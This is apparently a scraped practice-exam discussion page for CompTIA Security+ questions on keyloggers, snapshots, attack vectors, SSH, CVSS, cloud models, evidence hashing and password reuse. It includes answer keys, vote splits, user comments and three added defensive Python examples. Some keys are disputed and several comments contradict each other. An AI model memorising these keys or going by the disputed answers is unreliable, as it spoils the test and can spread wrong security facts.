TR3Y 4 months, 2 weeks ago
VDI can be used with COPE devices. I currently work at an organization that leverages VDI and gives us laptops....
upvoted 5 times

Ay_ma 4 months, 4 weeks ago
Selected Answer: C
COPE: Corporate-Owned Personally Enabled. The question states that the company is handing out laptops but then they can use them outside
of business requirements.
VDI (Virtual Desktop Infrastructure): You can access Operating Systems Virtually, It's like a whole desktop, but virtual.
Regarding the question, the employees can access company data through VDI, while being able to use the laptops for personal stuff.
upvoted 4 times
Wiggie 5 months ago
Selected Answer: A
https://www.ibm.com/topics/mobile-device-management
upvoted 1 times

comeragh 5 months ago
Selected Answer: C
Agree with C here. "issue each employee a new laptop". Laptops are issued so cannot be BYOD or CYOD.
upvoted 1 times

varun0 5 months ago
Selected Answer: C
Corporate is providing the laptops and can be used for personal use
upvoted 1 times

Wiggie 5 months ago
Selected Answer: A
https://control.connectwise.com/blog/remote-support-access/what-is-mobile-device-management-
mdm#:~:text=of%20traditional%20RMM.-,MDM%20is%20a%20type%20of%20security%20software%20used%20by%20an,being%20used%
20in%20the%20organization.
upvoted 1 times

Kristi 5 months ago
Selected Answer: D
If the company is issuing the laptops it's not BYOD, whatever their purpose is. Tricky question.
upvoted 1 times

Sandon 1 week ago
It's really not
upvoted 1 times

Boogie_79 5 months, 1 week ago
Selected Answer: D
BYOD is not issued by the organization, so that is incorrect. The question states that the company is issuing new laptops to the employees, so that
clearly is CYOD.
upvoted 2 times

Vishnuks 5 months ago
These laptops would access the users' corporate operating system remotely>> means VDI. So I think answer should be C.
upvoted 2 times


Question #75 Topic 1

Certain users are reporting their accounts are being used to send unauthorized emails and conduct suspicious activities. After further
investigation, a security analyst notices the following:
✑ All users share workstations throughout the day.
✑ Endpoint protection was disabled on several workstations throughout the network.
✑ Travel times on logins from the affected users are impossible.
✑ Sensitive data is being uploaded to external sites.
All user account passwords were forced to be reset and the issue continued.

Which of the following attacks is being used to compromise the user accounts?

A. Brute-force

B. Keylogger

C. Dictionary

D. Rainbow

Correct Answer: B

Community vote distribution


B (100%)

stoneface (Highly Voted) 5 months ago
Selected Answer: B
A keylogger would be the reason why, even after resetting the passwords, the issue persisted.

There is no information about the password itself that would allow us to determine whether any brute-force attack method is being used.
upvoted 14 times

varun0 (Highly Voted) 5 months ago
Selected Answer: B
Keylogger seems to be it.

End-user protection is disabled and someone installed a keylogger since workstations are being shared. Changing the password doesn't uninstall
this keylogger, which is likely recording the newly changed passwords and sending them out to the attacker.
upvoted 8 times

rodwave (Most Recent) 2 months, 3 weeks ago
Selected Answer: B
Answer - Keylogger

A keylogger or keystroke logger is a type of monitoring software that can be used to collect keystrokes that you type. A keylogger was likely used
to capture various sensitive information and credentials. As the issue continued after the password reset, the keylogger was still capturing
information as it wasn't removed.
=========================
Brute-force - trial and error attempts to guess login info
Dictionary - a form of brute force attack that uses common words, phrases and variations
Rainbow - uses tables of reversed hashes to crack passwords
upvoted 2 times

Knowledge33 3 months, 1 week ago
There is no relationship between the context and the questions/responses. It's so weird
upvoted 3 times
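The analyst's third finding, impossible travel times between logins, is a check that can be automated rather than eyeballed. The Python below is an added illustration, not code from this thread or from any product; the login records, their coordinates and the 1000 km/h plausibility threshold are constructed assumptions.

```python
"""Impossible-travel check over authentication records.

Added example, not part of the original thread. The sample logins and the
plausibility threshold are constructed/assumed; the names are hypothetical.
"""
from dataclasses import dataclass
from datetime import datetime, timezone
from math import asin, cos, radians, sin, sqrt

EARTH_RADIUS_KM = 6371.0
# Assumption: no legitimate user moves faster than an airliner between logins.
MAX_PLAUSIBLE_KMH = 1000.0


@dataclass(frozen=True)
class Login:
    user: str
    when: datetime          # timezone-aware UTC timestamp
    city: str               # label used only in the alert text
    lat: float              # geolocated source address, decimal degrees
    lon: float


@dataclass(frozen=True)
class TravelAlert:
    user: str
    from_city: str
    to_city: str
    km: float
    hours: float
    kmh: float


def haversine_km(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance between two points on Earth, in kilometres."""
    phi1, phi2 = radians(lat1), radians(lat2)
    dphi = radians(lat2 - lat1)
    dlam = radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(phi1) * cos(phi2) * sin(dlam / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))


def impossible_travel(logins, max_kmh: float = MAX_PLAUSIBLE_KMH):
    """Flag consecutive logins by the same user that would require moving
    faster than max_kmh between the two geolocated source points."""
    by_user: dict[str, list[Login]] = {}
    for login in sorted(logins, key=lambda l: (l.user, l.when)):
        by_user.setdefault(login.user, []).append(login)

    alerts = []
    for user, seq in by_user.items():
        for prev, cur in zip(seq, seq[1:]):
            km = haversine_km(prev.lat, prev.lon, cur.lat, cur.lon)
            hours = (cur.when - prev.when).total_seconds() / 3600.0
            if km < 1.0:
                continue  # same place (or same NAT egress): nothing to flag
            # Two logins at the same instant from different places are
            # impossible at any threshold; treat that as infinite speed.
            kmh = float("inf") if hours == 0 else km / hours
            if kmh > max_kmh:
                alerts.append(TravelAlert(user, prev.city, cur.city, km, hours, kmh))
    return alerts


def _utc(y, mo, d, h, mi):
    return datetime(y, mo, d, h, mi, tzinfo=timezone.utc)


# Constructed sample: alice's credential is used from two continents 90
# minutes apart (the scenario's "impossible travel"); bob commutes normally.
SAMPLE_LOGINS = [
    Login("alice", _utc(2023, 1, 23, 9, 0), "Chicago", 41.8781, -87.6298),
    Login("alice", _utc(2023, 1, 23, 10, 30), "Kyiv", 50.4501, 30.5234),
    Login("bob", _utc(2023, 1, 23, 9, 0), "New York", 40.7128, -74.0060),
    Login("bob", _utc(2023, 1, 23, 14, 0), "Boston", 42.3601, -71.0589),
]

if __name__ == "__main__":
    for a in impossible_travel(SAMPLE_LOGINS):
        print(f"{a.user}: {a.from_city} -> {a.to_city}, {a.km:.0f} km in "
              f"{a.hours:.1f} h (~{a.kmh:.0f} km/h) - impossible travel")
```

If the same alert recurs for a user after the forced password reset, the credential is still being captured at the endpoint, which is the reasoning the thread uses to prefer keylogger over the guessing attacks in the other options; VPN or proxy egress points are the usual source of false positives for this check.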


Question #76 Topic 1

A security forensics analyst is examining a virtual server. The analyst wants to preserve the present state of the virtual server, including memory
contents. Which of the following backup types should be used?

A. Snapshot

B. Differential

C. Cloud

D. Full

E. Incremental

Correct Answer: A

Community vote distribution


A (100%)

stoneface (Highly Voted) 5 months, 1 week ago
Selected Answer: A
A snapshot preserves the state and data of a virtual machine at a specific point in time.
The state includes the virtual machine’s power state (for example, powered-on, powered-off, suspended).
The data includes all of the files that make up the virtual machine. This includes disks, memory, and other devices, such as virtual network
interface cards.
A virtual machine provides several operations for creating and managing snapshots and snapshot chains. These operations let you create
snapshots, revert to any snapshot in the chain, and remove snapshots. You can create extensive snapshot trees.
upvoted 16 times

JaMorant (Most Recent) 5 days, 8 hours ago
present state is the keyword in this case so snapshot will do the job
upvoted 1 times

kennyleung0514 1 month, 1 week ago
A VM snapshot file consists of all the files stored on the storage devices of a virtual machine. Taking a snapshot creates files with extensions
.vmdk, -delta.vmdk, .vmsd, and .vmsn, which are stored with the VM base files.

A memory snapshot also includes a memory state file (with extension .vmsn) that holds the memory of the VM at the time of the snapshot
capture. The size of the memory file and the time it takes to capture the memory state depends on the configured maximum memory for the
original/parent VM.
upvoted 1 times

hackerguy 3 months, 1 week ago
Selected Answer: A
Per Dion Training notes:

Type of backup primarily used to capture the entire operating system image including all applications and data
§ Snapshots are also commonly used with virtualized systems
upvoted 1 times

comeragh 5 months ago
Selected Answer: A
Agree with A snapshot being the correct answer here
upvoted 2 times


Question #77 Topic 1

After returning from a conference, a user's laptop has been operating slower than normal and overheating, and the fans have been running
constantly. During the diagnosis process, an unknown piece of hardware is found connected to the laptop's motherboard. Which of the following
attack vectors was exploited to install the hardware?

A. Removable media

B. Spear phishing

C. Supply chain

D. Direct access

Correct Answer: A

Community vote distribution


D (73%) A (27%)

YusufMadkour Highly Voted 5 months, 1 week ago
Selected Answer: D
D because no hardware can be installed on the motherboard unless the perpetrator had direct access to the machine.
upvoted 21 times

Sandon 2 weeks, 1 day ago
Or the supply chain
upvoted 1 times

scarceanimal 15 hours, 24 minutes ago
That's not an attack vector.
upvoted 1 times

80drag 4 months, 1 week ago
But it doesn't say installed, just connected. The USB connector is attached to the motherboard.
upvoted 4 times

TheDarkSide2405 2 weeks, 1 day ago
USB doesn't unknown piece of hardware
upvoted 2 times

80drag 4 months, 1 week ago
I retract the previous statement.
upvoted 2 times

Boogie_79 Highly Voted 5 months, 1 week ago
Selected Answer: D
Direct access
upvoted 5 times

DALLASCOWBOYS Most Recent 5 days, 22 hours ago
A. Removable media. They most likely received a USB stick and installed into the USB port which contained malware. There is no indication they
have direct access to the device.
upvoted 1 times

DALLASCOWBOYS 5 days, 21 hours ago
The Direct Access will allow the attacker access to attack vectors, but the direct access is not itself an attack vector.
upvoted 1 times

sanlibo 2 weeks, 2 days ago
Selected Answer: D
https://www.professormesser.com/security-plus/sy0-601/sy0-601-video/attack-vectors/
upvoted 1 times

jhfdkjshfkjdsho 1 month, 2 weeks ago
Selected Answer: A
Removable media was inserted into the motherboard directly. It doesn't mention there is direct access to some sensitive data.
upvoted 2 times

Kalender 2 months, 1 week ago
Selected Answer: D
DIRECT-ACCESS ATTACKS
A direct-access attack is simply gaining physical access to the targeted computer system. This would enable the attacker to damage the hardware and software, to install keyloggers, worms, viruses and covert listening devices or to manually copy sensitive information and data from the device.
https://www.interelectronix.com/computer-security.html
upvoted 1 times

okay123 2 months, 3 weeks ago
Selected Answer: D
D: Direct access to the motherboard
upvoted 1 times

Jossie_C 3 months ago
Not necessarily removable media that was connected. Answer is D
upvoted 1 times

Jossie_C 3 months ago
Selected Answer: D
In a direct-access attack, a person gains physical access to a computer and performs malicious actions including installing different types of
devices to compromise security, like operating system modifications, software worms, keyloggers or covert listening devices.
upvoted 2 times

Knowledge33 3 months, 1 week ago
Selected Answer: A
Direct access is just that: the attacker has direct access to the system.
upvoted 2 times

p610878 3 months, 1 week ago
Selected Answer: A
A direct access threat vector is when the attacker is able to directly control the targeted system. This can take place through direct physical contact with the system's keyboard or may occur through a remote access connection.
upvoted 2 times

Funt 3 months, 2 weeks ago
I may be the only one, but I believe it may be supply chain. If you have a compromised vendor that has tampered motherboards it would fit the
description.
upvoted 3 times

HypeMan_crew 2 months, 2 weeks ago
This was my choice and I would have agreed to this as well but it seems the laptop has been working fine until after the conference. So I
would stick with direct access
upvoted 1 times

Jossie_C 3 months ago
That's uncertain especially if the vendor is trusted...INCORRECT.
upvoted 1 times

Gino_Slim 3 months, 2 weeks ago
Yeah bro, you're the only one. Over thought it.
upvoted 5 times

emtpyspoon885 4 months, 1 week ago
Confused here: "Direct Access" isn't in any of my study material.
upvoted 2 times

carpathia 4 months, 3 weeks ago
Selected Answer: A
This is a strange one. Connected to the motherboard sounds like direct access. Even though a USB stick is connected directly to the motherboard... and then, who would open up a laptop to install hardware (where there is no room)? I sometimes see a separate USB controller card inside laptops (hence the USB stick is not directly connected to the MB)... Vectors can be Direct Access and Removable Media plus others, and they exclude each other (pg 86 in a book I am studying for Sec+). Diagnosis process - well, a USB stick doesn't need a "diagnostic process" cause it's pretty obvious, but from an official point of view it does. "I am sending the laptop for diagnostic - wow, there is a USB stick attached to it!"... What a finding!
upvoted 2 times

Michelle2022 4 months, 4 weeks ago
Selected Answer: A
A is best answer to me because "an unknown piece of hardware is found connected to the laptop's motherboard."
upvoted 4 times

[Removed] 5 months ago
Selected Answer: D
Keyword here is VECTOR. The answer is D.
upvoted 2 times

Gravoc 4 months, 2 weeks ago
Removable media is also an attack vector. I agree with D being the answer here, but wanted to clarify that the attack vector alone doesn't give
us an answer. Both are initiation points of attacks, therefore are attack vectors.
upvoted 2 times

lordguck 3 months ago
If it was a USB dongle I would agree with you, but as the device is directly connected to the motherboard, it is not removable anymore. I think it is D, although C has some validity, too.
I go by the definition: In a direct-access attack, a person gains physical access to a computer and performs malicious actions including installing different types of devices to compromise security, like operating system modifications, software worms, keyloggers or covert listening devices.
upvoted 1 times


Question #78 Topic 1

After a recent security breach, a security analyst reports that several administrative usernames and passwords are being sent via cleartext across
the network to access network devices over port 23. Which of the following should be implemented so all credentials sent over the network are
encrypted when remotely accessing and configuring network devices?

A. SSH

B. SNMPv3

C. SFTP

D. Telnet

E. FTP

Correct Answer: A

Community vote distribution


A (100%)

comeragh Highly Voted 5 months ago
Selected Answer: A
Telnet (port 23) is insecure and should be replaced with SSH (port 22)
upvoted 10 times

[Removed] 5 months ago
Correct, SSH is the answer.
upvoted 2 times

scarceanimal Most Recent 15 hours, 22 minutes ago
Selected Answer: A
SSH replaces Telnet in that it provides an encrypted session. Telnet sends in cleartext; insecure.
upvoted 1 times

DALLASCOWBOYS 5 days, 22 hours ago
A. SSH. SSH is an encryption protocol used to connect to systems.
upvoted 1 times

Samsonite363 1 week, 2 days ago
Selected Answer: A
Easiest question in this guide.
upvoted 1 times

rodwave 2 months, 3 weeks ago
Selected Answer: A
Answer: SSH (22)

Port 23 (Telnet) and Port 22 (SSH) are network protocols used to remotely access and manage systems; however, Telnet does not encrypt the connection, so captured traffic appears in cleartext, whereas an SSH connection would be encrypted.
=========================

SNMP (Simple Network Management Protocol) - is a protocol for collecting and organizing information about managed devices on networks. Devices that typically support SNMP include servers/desktops, routers, switches, etc.

SFTP (Secure File Transfer Protocol) is a secure file transfer protocol that uses SSH encryption to securely send and receive file transfers.

FTP (File Transfer Protocol) - For file transfers
upvoted 3 times
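To make the cleartext-versus-encrypted distinction in this thread concrete from the defender's side, here is an added Python example (it is not from the ExamTopics thread or from any CompTIA material) that audits flow records for remote-management sessions still carrying credentials unencrypted. The record format, the sample flows and the payload bytes are all constructed for this example. It recognises Telnet by its option-negotiation bytes and SSH by its version banner, so a Telnet service moved off port 23 is still reported, and it names the encrypted replacement for each finding.

```python
"""Flag remote-management sessions that still carry credentials in cleartext."""
import re

# Well-known cleartext management ports and the encrypted replacement for each.
CLEARTEXT_PORTS = {
    23: ("telnet", "SSH (port 22)"),
    21: ("ftp", "SFTP over SSH, or FTPS"),
    80: ("http", "HTTPS (port 443)"),
    161: ("snmp v1/v2c", "SNMPv3 with authPriv"),
}

# Constructed record format: "<ts> <src>:<sport> -> <dst>:<dport> <proto> [payload=<hex>]"
FLOW_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>[\d.]+):(?P<sport>\d+)\s*->\s*"
    r"(?P<dst>[\d.]+):(?P<dport>\d+)\s+(?P<proto>\w+)"
    r"(?:\s+payload=(?P<payload>[0-9a-fA-F]*))?$"
)


def classify_payload(payload: bytes) -> str:
    """Identify the application protocol from the first bytes of the session."""
    if payload.startswith((b"SSH-2.0", b"SSH-1.99")):
        return "ssh"                       # SSH version banner (RFC 4253)
    # Telnet option negotiation: IAC (0xFF) followed by WILL/WONT/DO/DONT (0xFB-0xFE).
    if len(payload) >= 2 and payload[0] == 0xFF and 0xFB <= payload[1] <= 0xFE:
        return "telnet"
    if b"login:" in payload.lower() or b"password:" in payload.lower():
        return "cleartext-login-prompt"   # a credential prompt readable on the wire
    return "unknown"


def audit_flows(lines):
    """Return one finding per flow that exposes credentials without encryption."""
    findings = []
    for line in lines:
        m = FLOW_RE.match(line.strip())
        if not m:
            continue                       # skip malformed records
        dport = int(m["dport"])
        app = classify_payload(bytes.fromhex(m["payload"] or ""))
        reason = None
        if app in ("telnet", "cleartext-login-prompt"):
            reason = f"{app} traffic on port {dport}"
        elif dport in CLEARTEXT_PORTS and app != "ssh":
            reason = f"{CLEARTEXT_PORTS[dport][0]} on well-known port {dport}"
        if reason:
            fix = CLEARTEXT_PORTS.get(dport, (None, "SSH (port 22)"))[1]
            findings.append({"ts": m["ts"], "src": m["src"], "dst": m["dst"],
                             "dport": dport, "reason": reason, "fix": fix})
    return findings


# Constructed sample records (not real traffic): Telnet negotiation on 23, an SSH
# banner on 22, a "Password: " prompt on a non-standard port, HTTPS, and SNMP.
SAMPLE_FLOWS = [
    "2023-01-23T09:00:01Z 10.0.0.5:51234 -> 10.0.0.1:23 TCP payload=fffb01fffb03",
    "2023-01-23T09:00:05Z 10.0.0.5:51240 -> 10.0.0.2:22 TCP payload=5353482d322e302d4f70656e535348",
    "2023-01-23T09:00:09Z 10.0.0.7:40022 -> 10.0.0.3:2323 TCP payload=50617373776f72643a20",
    "2023-01-23T09:00:12Z 10.0.0.7:40030 -> 10.0.0.4:443 TCP",
    "2023-01-23T09:01:00Z 10.0.0.5:53000 -> 10.0.0.1:161 UDP",
]

if __name__ == "__main__":
    for f in audit_flows(SAMPLE_FLOWS):
        print(f"{f['ts']} {f['src']} -> {f['dst']}:{f['dport']}: {f['reason']}; use {f['fix']}")
```

Run against the sample, the audit reports the Telnet session on port 23, the cleartext login prompt on port 2323 and the SNMP v1/v2c traffic, and stays quiet about the SSH and HTTPS flows; the payload check is what catches the non-standard-port case that a port-only rule would miss.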


Question #79 Topic 1

Which of the following provides a calculated value for known vulnerabilities so organizations can prioritize mitigation steps?

A. CVSS

B. SIEM

C. SOAR

D. CVE

Correct Answer: A

Community vote distribution


A (100%)

stoneface Highly Voted 5 months, 1 week ago
Selected Answer: A
CVSS is maintained by the Forum of Incident Response and Security Teams (first.org/cvss). CVSS metrics generate a score from 0 to 10 based on characteristics of the vulnerability, such as whether it can be triggered remotely or needs local access, whether user intervention is required, and so on.
upvoted 9 times

DALLASCOWBOYS Most Recent 5 days, 22 hours ago
A. CVSS. The Common Vulnerability Scoring System is an industry standard for assessing the severity of security vulnerabilities.
upvoted 1 times

Jossie_C 3 months ago
Selected Answer: A
Common Vulnerability Scoring System
upvoted 1 times

ExamTopicsDiscussor 4 months ago
CVSS stands for the correct
upvoted 1 times

carpathia 4 months, 3 weeks ago
Selected Answer: A
"calculated" = CVSS
upvoted 1 times

comeragh 5 months ago
Selected Answer: A
Agree with A - CVSS here as the correct answer
upvoted 1 times


Question #80 Topic 1

Several universities are participating in a collaborative research project and need to share compute and storage resources. Which of the following
cloud deployment strategies would BEST meet this need?

A. Community

B. Private

C. Public

D. Hybrid

Correct Answer: A

Community vote distribution


A (91%) 9%

scarceanimal 15 hours, 18 minutes ago
Selected Answer: A
sharing infrastructure
upvoted 1 times

DALLASCOWBOYS 5 days, 21 hours ago
A. Community Cloud Deployment, where tenants are limited to members of a specifically designed community. Community membership is normally based on a shared mission, similar security and compliance requirements, or other commonalities.
upvoted 1 times

Astra10 1 week, 4 days ago
D. Hybrid cloud deployment strategy would BEST meet the need for universities participating in a collaborative research project to share
compute and storage resources. A hybrid cloud deployment allows organizations to use a combination of public and private cloud resources. In
this case, the universities can keep sensitive data on their private cloud while sharing the compute and storage resources on a public cloud. This
way, the universities can have the benefits of both the public and private cloud.

A. Community cloud deployment strategy is when multiple organizations share a cloud infrastructure, but the resources are only available to a
specific community of users.

B. Private cloud deployment strategy is when an organization builds and maintains a cloud infrastructure for its own use.

C. Public cloud deployment strategy is when an organization uses a cloud infrastructure provided by a third-party provider, available to the
general public.
upvoted 1 times

bsComptia 2 weeks, 1 day ago
A community cloud deployment strategy, while it may be able to meet the need for sharing compute and storage resources among a group of
universities, would likely not be the best option. A community cloud is typically shared among organizations with similar security and compliance
requirements, and is often managed by a third-party provider. However, the level of control and customization offered by a community cloud may
be limited compared to a hybrid cloud deployment strategy, which combines elements of both public and private cloud deployment. This would
give the universities more control and flexibility in terms of how they manage and utilize their shared resources.
upvoted 1 times

bsComptia 2 weeks, 1 day ago
how about this?
upvoted 1 times

bsComptia 2 weeks, 1 day ago
A hybrid cloud deployment strategy is a combination of both private and public cloud deployment. This approach allows organizations to
take advantage of the benefits of both types of clouds, depending on their specific needs.

In a hybrid cloud deployment, sensitive and/or regulated data is kept on the private cloud, which provides a higher level of security and
compliance. Meanwhile, less sensitive workloads can be run on the public cloud, which allows for greater scalability and cost-
effectiveness. The two clouds are connected through secure, dedicated connections, such as VPNs, allowing for data and application
portability.

This deployment strategy allows organizations to take advantage of the benefits of both public and private clouds, depending on their
specific needs. It also allows organizations to reduce costs by using public cloud resources for non-sensitive workloads, and to improve
security by keeping sensitive data on the private cloud.
upvoted 1 times

sanlibo 2 weeks, 2 days ago
Selected Answer: A
A community cloud is defined as a cloud infrastructure in which multiple organizations share resources and services based on common operational and regulatory requirements.
upvoted 2 times
tek7ila 2 months ago
Selected Answer: D
D - because they only share compute and storage, so they connect the on-premise network with the cloud, which they share.
upvoted 1 times

Jossie_C 3 months ago
Selected Answer: A
Community is when different organizations share same stuff
upvoted 3 times

nobodyridesforfree 3 months, 2 weeks ago
Selected Answer: A
Community (shared)
upvoted 1 times

comeragh 5 months ago
Selected Answer: A
A - Community " share compute and storage resources"
upvoted 2 times

varun0 5 months ago
Selected Answer: A
Community
upvoted 1 times


Question #81 Topic 1

A forensic analyst needs to prove that data has not been tampered with since it was collected. Which of the following methods will the analyst
MOST likely use?

A. Look for tampering on the evidence collection bag.

B. Encrypt the collected data using asymmetric encryption.

C. Ensure proper procedures for chain of custody are being followed.

D. Calculate the checksum using a hashing algorithm.

Correct Answer: D

Community vote distribution


D (62%) C (38%)

stoneface Highly Voted 5 months, 1 week ago
Selected Answer: C
Procedure to establish the Chain of Custody

In order to assure the authenticity of the chain of custody, a series of steps must be followed. It is important to note that the more information the forensic expert obtains concerning the evidence, the more authentic is the created chain of custody. You should ensure that the following procedure is followed according to the chain of custody for electronic devices:

Save the original material
Take photos of the physical evidence
Take screenshots of the digital evidence.
Document date, time, and any other information on the receipt of the evidence.
Inject a bit-for-bit clone of digital evidence content into forensic computers.
Perform a hash test analysis to authenticate the working clone.
upvoted 12 times

KetReeb 5 months ago
While your reasoning is a best practice, the only way to prove the integrity of the data after it's been handled is by verifying the checksum (Answer D).
upvoted 23 times

stoneface 5 months ago
I stand corrected -> D is correct - ensuring is not a method
upvoted 11 times

KetReeb 5 months ago
I'm sorry stoneface, I have to retract my comment after running across the following in the all-in-one review: regarding checksums - A
disadvantage is that they miss larger numbers of errors as a second error can cancel the effect of the first on a checksum. Thus,
checksums serve no real purpose in digital forensics.
Your answer is best.
upvoted 9 times

rodwave Highly Voted 2 months, 3 weeks ago
Selected Answer: D
Answer: Calculate the checksum using a hashing algorithm. (D)

A checksum is specifically intended to verify the integrity of data or find data corruption. Comparing a file's original and current checksum. And if
a byte or even a piece of the file's data has been changed, the original and current checksum will be different, and therefore you will know
whether it's the same file or not.
=====================
(A) - This is essentially the physical version of checking if something was tampered but wouldn't work for virtual data
(B) - Don't need to encrypt anything
(C) - Even if a proper chain of custody was followed, it doesn't guarantee that data hasn't been modified by anyone that had access to the data.
upvoted 11 times
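Two points in this thread deserve a worked example: KetReeb's retraction (a second error can cancel the first on a checksum) and rodwave's description of comparing a file's original and current digest. The Python below is an added example, not code from the page or from CompTIA. It records a SHA-256 digest when evidence is acquired, re-verifies it later, and constructs a tampered copy in which two byte changes offset each other, so a plain additive checksum still matches while the cryptographic hash does not. The evidence bytes and the tampering offsets are constructed for the demonstration.

```python
"""Evidence integrity: cryptographic hash versus a simple additive checksum."""
import hashlib
import hmac


def simple_checksum(data: bytes) -> int:
    """Additive 16-bit checksum, the kind used for transmission-error detection."""
    return sum(data) & 0xFFFF


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def record_acquisition(data: bytes) -> dict:
    """What the analyst writes into the custody log at collection time."""
    return {"algorithm": "sha256", "digest": sha256_hex(data), "size": len(data)}


def verify_integrity(data: bytes, record: dict) -> bool:
    """Re-hash the evidence and compare with the recorded digest (constant-time compare)."""
    if record["algorithm"] != "sha256" or len(data) != record["size"]:
        return False
    return hmac.compare_digest(sha256_hex(data), record["digest"])


def tamper_with_offsetting_changes(data: bytes, i: int, j: int) -> bytes:
    """Constructed tampering: +1 at offset i and -1 at offset j, so the byte sum is unchanged."""
    buf = bytearray(data)
    if buf[i] == 0xFF or buf[j] == 0x00:
        raise ValueError("offsets must absorb +1/-1 without wrapping")
    buf[i] += 1
    buf[j] -= 1
    return bytes(buf)


# Constructed sample evidence (a few bytes standing in for a disk image).
EVIDENCE = b"account=alice;balance=100;last_login=2023-01-23\n"


def demo() -> dict:
    """Raise the balance from 100 to 200 with a compensating edit elsewhere."""
    record = record_acquisition(EVIDENCE)
    tampered = tamper_with_offsetting_changes(EVIDENCE, 22, 20)  # '1'->'2', 'e'->'d'
    return {
        "checksum_unchanged": simple_checksum(EVIDENCE) == simple_checksum(tampered),
        "hash_detects": not verify_integrity(tampered, record),
        "original_verifies": verify_integrity(EVIDENCE, record),
    }


if __name__ == "__main__":
    print(demo())
```

The additive checksum cannot tell the two files apart, which is the weakness KetReeb quotes; a cryptographic hash changes for any single-bit difference, which is why the digest recorded at acquisition is what the analyst produces to prove the data was not altered afterwards, with the custody log saying who held it in between.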

scarceanimal Most Recent 15 hours, 15 minutes ago
Selected Answer: D
A checksum on a file is a 'digital fingerprint' whereby even the smallest change to the file will cause the checksum to change completely.
Tampering will cause this change.
upvoted 1 times

sarah2023 1 day, 16 hours ago
Selected Answer: C
Chain of custody documentation reinforces the integrity and proper handling of evidence from collection, to analysis, to storage, and finally to presentation. When security breaches go to trial, the chain of custody protects an organization against accusations that evidence has either been tampered with or is different than it was when it was collected. Every person in the chain who handles evidence must log the methods and tools they used.

CompTIA Security+ study guide
upvoted 1 times
hanmai 2 days, 17 hours ago
An unbreakable chain of custody is crucial to the forensic investigation process; it’s proof that the digital evidence hasn’t been tampered with,
mishandled, or altered.
upvoted 1 times

ronniehaang 4 days, 16 hours ago
Selected Answer: D
D. Calculate the checksum using a hashing algorithm.

A forensic analyst can prove that data has not been tampered with by using a hashing algorithm to calculate the checksum of the data. A
checksum is a small value calculated from the data that serves as a fingerprint of the data. If the checksum of the data changes, even by a single
bit, it indicates that the data has been altered. The analyst can compare the calculated checksum of the collected data with a known good value
to confirm that the data has not been tampered with. This method is widely used in digital forensics to ensure the integrity and authenticity of
collected evidence. Additionally, following proper procedures for chain of custody helps to maintain the integrity of the evidence and to provide a
clear record of who has had access to the evidence.
upvoted 1 times

DALLASCOWBOYS 5 days, 21 hours ago
D. Checksum. Checksum is used to check the files for integrity.
upvoted 1 times

ZDW 1 week, 5 days ago
The way I see it, when you are wanting to prove it has not been modified, you aren't going to simply show the chain of custody; that doesn't prove the data has not been manipulated. You need to show the hashes.
upvoted 2 times

ZDW 1 week, 5 days ago
another reason I say this is, it says "ensure the proper procedures are being followed" but if you're having to prove it, it's too late to ensure
they are doing what they should be doing. You need to prove it was done and showing the checksum/hash is how you would do that.
upvoted 1 times

xxxdolorxxx 2 weeks, 1 day ago
Selected Answer: D
Answer is D.
Even if the proper chain of custody has been followed, this doesn't "guarantee" it hasn't been changed. Someone could have changed it along the chain. The checksum is the only way to mathematically guarantee it hasn't been changed.
upvoted 3 times

sanlibo 2 weeks, 2 days ago
Hashing is the simplest type of cryptographic operation. A cryptographic hashing algorithm produces a fixed length string from an input plaintext that can be of any length. The output can be referred to as a checksum, message digest, or hash. The function is designed so that it is impossible to recover the plaintext data from the digest (one-way) and so that different inputs are unlikely to produce the same output (a collision).

The Official CompTIA Security+ Student Guide (Exam SY0-601) | 97
upvoted 1 times

byfener 1 month, 2 weeks ago
Selected Answer: D
"needs to prove that data has not been tampered with since it was collected." Data was already collected, now he has to prove not tampered, so
he can only check the hash to prove...
upvoted 1 times

jhfdkjshfkjdsho 1 month, 2 weeks ago
Selected Answer: D
Calculating checksum... There is no forensic... etc. in the question
upvoted 1 times

Nirmalabhi 2 months ago
Selected Answer: D
Don't get confused by the options. I'll go with option D.
upvoted 1 times

carpathia 2 months, 1 week ago
Selected Answer: C
Actually checksums are not meant for this purpose ( https://www.professormesser.com/security-plus/sy0-601/sy0-601-video/managing-evidence/ ). So, it should be Chain of Custody.
upvoted 1 times

carpathia 2 months, 1 week ago
In other words D is a non statement as checksum is not a hash.
upvoted 1 times

fzorsqqmdmsvfqvqdv 1 month, 3 weeks ago
checksums are used to verify INTEGRITY of the file. it's D.
upvoted 1 times

viksap 2 months, 2 weeks ago
I think it's C
upvoted 1 times

okay123 2 months, 2 weeks ago
Selected Answer: C
I am going to say C because this must be a trick question.

"Checksums have three main uses:

To know that a file has been correctly received from a content owner or source and then transferred successfully to preservation storage
To know that file fixity has been maintained when that file is being stored.
To be given to users of the file in the future so they know that the file has been correctly retrieved from storage and delivered to them.
This allows a ‘chain of custody’ to be established between those who produce or supply the digital materials, those responsible for its ongoing
storage, and those who need to use the digital material that has been stored."

So calculating checksum is part of the chain of custody process! preserving evidence and whatnot so, it must be C
upvoted 2 times

carpathia 2 months, 3 weeks ago
Selected Answer: D
The keyword is Data here. That would imply a checksum.
upvoted 3 times


Question #82 Topic 1

Multiple business accounts were compromised a few days after a public website had its credentials database leaked on the Internet. No business
emails were identified in the breach, but the security team thinks that the list of passwords exposed was later used to compromise business
accounts. Which of the following would mitigate the issue?

A. Complexity requirements

B. Password history

C. Acceptable use policy

D. Shared accounts

Correct Answer: B

Community vote distribution


B (76%) C (24%)

antster1000 Highly Voted 5 months ago
Don't really feel like any of the answers are sufficient. Would be looking for something like MFA for this.
upvoted 18 times

stoneface Highly Voted 5 months ago
Selected Answer: B
Password reuse is an important concern in any organization. Many users want to reuse the same password for their account over a long period of
time.
upvoted 11 times

DALLASCOWBOYS Most Recent 5 days, 21 hours ago
B. Password History. But hopefully the passwords were changed by the time the credentials were leaked. Would be the BEST answer of the choices listed.
upvoted 1 times

rodwave 2 months, 3 weeks ago
Selected Answer: B
Answer: Password History

Password history policies determine the number of unique new passwords that must be associated with a user's account before an old password can be reused, essentially forcing users to create new passwords on a regular basis.

For this situation, forcing users to use new unique passwords would somewhat mitigate the issue.
upvoted 4 times

TinyTrexArmz 13 hours, 15 minutes ago
